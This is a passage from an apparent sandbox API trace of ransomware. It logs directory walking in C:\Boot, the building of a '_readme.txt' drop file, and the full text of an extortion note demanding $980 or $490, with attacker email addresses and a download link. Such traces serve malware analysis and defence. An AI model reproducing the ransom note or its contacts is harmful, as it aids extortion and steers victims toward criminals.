hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.848] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0183.848] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.849] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.849] PathFindFileNameW (pszPath="") returned="" [0183.849] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.850] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.850] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.850] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.851] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0183.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.851] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0183.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.852] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.852] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.852] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0183.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.853] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*" (normalized: "c:\\boot\\fi-fi\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.854] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.854] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.854] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.854] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.855] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 